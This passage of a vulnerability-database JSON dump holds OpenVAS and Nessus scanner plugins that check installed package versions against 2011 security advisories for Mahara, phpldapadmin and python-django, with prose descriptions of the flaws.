"AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2773", "CVE-2011-2772", "CVE-2011-2771"], "description": "The remote host is missing an update to mahara\nannounced via advisory DSA 2334-1.", "modified": "2019-03-18T00:00:00", "published": "2012-02-11T00:00:00", "id": "OPENVAS:136141256231070550", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070550", "type": "openvas", "title": "Debian Security Advisory DSA 2334-1 (mahara)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2334_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2334-1 (mahara)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70550\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-2771\", \"CVE-2011-2772\", \"CVE-2011-2773\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 02:27:34 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2334-1 (mahara)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202334-1\");\n script_tag(name:\"insight\", value:\"Several vulnerabilities were discovered in Mahara, an electronic\nportfolio, weblog, and resume builder:\n\nCVE-2011-2771\n\nTeemu Vesala discovered that missing input sanitising of RSS\nfeeds could lead to cross-site scripting.\n\nCVE-2011-2772\n\nRichard Mansfield discovered that insufficient upload restrictions\nallowed denial of service.\n\nCVE-2011-2773\n\nRichard Mansfield that the management of institutions was prone to\ncross-site request forgery.\n\n(no CVE ID available yet)\n\nAndrew Nichols discovered a privilege escalation vulnerability\nin MNet handling.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.4-4+lenny11.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.6-2+squeeze3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.1-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your mahara packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to mahara\nannounced via advisory DSA 2334-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"mahara\", ver:\"1.0.4-4+lenny11\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-apache2\", ver:\"1.0.4-4+lenny11\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara\", ver:\"1.2.6-2+squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-apache2\", ver:\"1.2.6-2+squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-mediaplayer\", ver:\"1.2.6-2+squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:55:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "description": "Check for the Version of phpldapadmin", "modified": "2017-07-06T00:00:00", "published": "2011-11-03T00:00:00", "id": "OPENVAS:831481", "href": "http://plugins.openvas.org/nasl.php?oid=831481", "type": "openvas", "title": "Mandriva Update for phpldapadmin MDVSA-2011:163 (phpldapadmin)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for phpldapadmin MDVSA-2011:163 (phpldapadmin)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities was discovered and corrected in phpldapadmin:\n\n Input appended to the URL in cmd.php \\(when cmd is set to _debug\\)\n is not properly sanitised before being returned to the user. This can\n be exploited to execute arbitrary HTML and script code in a user&amp;#039;s\n browser session in context of an affected site (CVE-2011-4074).\n \n Input passed to the orderby parameter in cmd.php \\(when cmd is set\n to query_engine, query is set to none, and search is set to e.g. 1\\)\n is not properly sanitised in lib/functions.php before being used in\n a create_function() function call. This can be exploited to inject\n and execute arbitrary PHP code (CVE-2011-4075).\n \n The updated packages have been upgraded to the latest version (1.2.2)\n which is not vulnerable to these issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpldapadmin on Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-11/msg00001.php\");\n script_id(831481);\n script_version(\"$Revision: 6565 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 14:56:06 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-03 12:22:48 +0100 (Thu, 03 Nov 2011)\");\n script_xref(name: \"MDVSA\", value: \"2011:163\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_name(\"Mandriva Update for phpldapadmin MDVSA-2011:163 (phpldapadmin)\");\n\n script_summary(\"Check for the Version of phpldapadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.2~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-11-25T00:00:00", "id": "OPENVAS:1361412562310863642", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863642", "type": "openvas", "title": "Fedora Update for phpldapadmin FEDORA-2011-14986", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpldapadmin FEDORA-2011-14986\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069724.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863642\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-25 11:59:09 +0530 (Fri, 25 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2011-14986\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_name(\"Fedora Update for phpldapadmin FEDORA-2011-14986\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpldapadmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"phpldapadmin on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.1.1~2.20111006git.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-06T13:07:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "description": "Check for the Version of phpldapadmin", "modified": "2018-01-05T00:00:00", "published": "2012-04-02T00:00:00", "id": "OPENVAS:863956", "href": "http://plugins.openvas.org/nasl.php?oid=863956", "type": "openvas", "title": "Fedora Update for phpldapadmin FEDORA-2011-14924", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpldapadmin FEDORA-2011-14924\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PhpLDAPadmin is a web-based LDAP client.\n It provides easy, anywhere-accessible, multi-language administration\n for your LDAP server. Its hierarchical tree-viewer and advanced search\n functionality make it intuitive to browse and administer your LDAP directory.\n\n Since it is a web application, this LDAP browser works on many platforms,\n making your LDAP server easily manageable from any location.\n\n PhpLDAPadmin is the perfect LDAP browser for the LDAP professional\n and novice alike. Its user base consists mostly of LDAP administration\n professionals.\n\n Edit /etc/phpldapadmin/config.php to change default (localhost) LDAP server\n location and other things. Edit /etc/httpd/conf.d/phpldapadmin.conf to allow\n access by remote web-clients.\";\n\ntag_affected = \"phpldapadmin on Fedora 16\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069708.html\");\n script_id(863956);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:38:15 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2011-14924\");\n script_name(\"Fedora Update for phpldapadmin FEDORA-2011-14924\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of phpldapadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.1.1~2.20111006git.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "description": "Check for the Version of phpldapadmin", "modified": "2017-07-10T00:00:00", "published": "2011-11-25T00:00:00", "id": "OPENVAS:863637", "href": "http://plugins.openvas.org/nasl.php?oid=863637", "type": "openvas", "title": "Fedora Update for phpldapadmin FEDORA-2011-14993", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpldapadmin FEDORA-2011-14993\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PhpLDAPadmin is a web-based LDAP client.\n It provides easy, anywhere-accessible, multi-language administration\n for your LDAP server. Its hierarchical tree-viewer and advanced search\n functionality make it intuitive to browse and administer your LDAP directory.\n\n Since it is a web application, this LDAP browser works on many platforms,\n making your LDAP server easily manageable from any location.\n \n PhpLDAPadmin is the perfect LDAP browser for the LDAP professional\n and novice alike. Its user base consists mostly of LDAP administration\n professionals.\n \n Edit /etc/phpldapadmin/config.php to change default (localhost) LDAP server\n location and other things. Edit /etc/httpd/conf.d/phpldapadmin.conf to allow\n access by remote web-clients.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpldapadmin on Fedora 15\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069777.html\");\n script_id(863637);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-25 11:58:32 +0530 (Fri, 25 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2011-14993\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_name(\"Fedora Update for phpldapadmin FEDORA-2011-14993\");\n\n script_summary(\"Check for the Version of phpldapadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.1.1~2.20111006git.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-12T09:47:05", "description": "Paul McMillan, Mozilla and the Django core team discovered several\nvulnerabilities in Django, a Python web framework :\n\n - CVE-2011-4136\n When using memory-based sessions and caching, Django\n sessions are stored directly in the root namespace of\n the cache. When user data is stored in the same cache, a\n remote user may take over a session.\n\n - CVE-2011-4137, CVE-2011-4138\n Django's field type URLfield by default checks supplied\n URL's by issuing a request to it, which doesn't time\n out. A Denial of Service is possible by supplying\n specially prepared URL's that keep the connection open\n indefinately or fill the Django's server memory.\n\n - CVE-2011-4139\n Django used X-Forwarded-Host headers to construct full\n URL's. This header may not contain trusted input and\n could be used to poison the cache.\n\n - CVE-2011-4140\n The CSRF protection mechanism in Django does not\n properly handle web-server configurations supporting\n arbitrary HTTP Host headers, which allows remote\n attackers to trigger unauthenticated forged requests.", "edition": 17, "published": "2011-10-31T00:00:00", "title": "Debian DSA-2332-1 : python-django - several issues", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4140", "CVE-2011-4138", "CVE-2011-4139"], "modified": "2011-10-31T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:python-django"], "id": "DEBIAN_DSA-2332.NASL", "href": "https://www.tenable.com/plugins/nessus/56671", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2332. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56671);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\", \"CVE-2011-4140\");\n script_bugtraq_id(49573);\n script_xref(name:\"DSA\", value:\"2332\");\n\n script_name(english:\"Debian DSA-2332-1 : python-django - several issues\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul McMillan, Mozilla and the Django core team discovered several\nvulnerabilities in Django, a Python web framework :\n\n - CVE-2011-4136\n When using memory-based sessions and caching, Django\n sessions are stored directly in the root namespace of\n the cache. When user data is stored in the same cache, a\n remote user may take over a session.\n\n - CVE-2011-4137, CVE-2011-4138\n Django's field type URLfield by default checks supplied\n URL's by issuing a request to it, which doesn't time\n out. A Denial of Service is possible by supplying\n specially prepared URL's that keep the connection open\n indefinately or fill the Django's server memory.\n\n - CVE-2011-4139\n Django used X-Forwarded-Host headers to construct full\n URL's. This header may not contain trusted input and\n could be used to poison the cache.\n\n - CVE-2011-4140\n The CSRF protection mechanism in Django does not\n properly handle web-server configurations supporting\n arbitrary HTTP Host headers, which allows remote\n attackers to trigger unauthenticated forged requests.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=641405\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4136\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4137\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4138\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4139\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4140\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/python-django\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2332\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the python-django packages.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-1+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.3-3+squeeze2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python-django\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"python-django\", reference:\"1.0.2-1+lenny3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"python-django\", reference:\"1.2.3-3+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"python-django-doc\", reference:\"1.2.3-3+squeeze2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:25:09", "description": "python-django update version to 1.2.7 fixes several security issues\nincluding denial of service, CSRF and information leaks:\nhttps://www.djangoproject.com/weblog/2011/sep/10/127/", "edition": 19, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : python-django (openSUSE-SU-2012:0653-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4140", "CVE-2011-4138", "CVE-2011-4139"], "modified": "2014-06-13T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.4", "p-cpe:/a:novell:opensuse:python-django"], "id": "OPENSUSE-2012-294.NASL", "href": "https://www.tenable.com/plugins/nessus/74633", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-294.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74633);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\", \"CVE-2011-4140\");\n\n script_name(english:\"openSUSE Security Update : python-django (openSUSE-SU-2012:0653-1)\");\n script_summary(english:\"Check for the openSUSE-2012-294 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"python-django update version to 1.2.7 fixes several security issues\nincluding denial of service, CSRF and information leaks:\nhttps://www.djangoproject.com/weblog/2011/sep/10/127/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=718045\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-05/msg00037.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.djangoproject.com/weblog/2011/sep/10/127/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python-django package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-django\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n 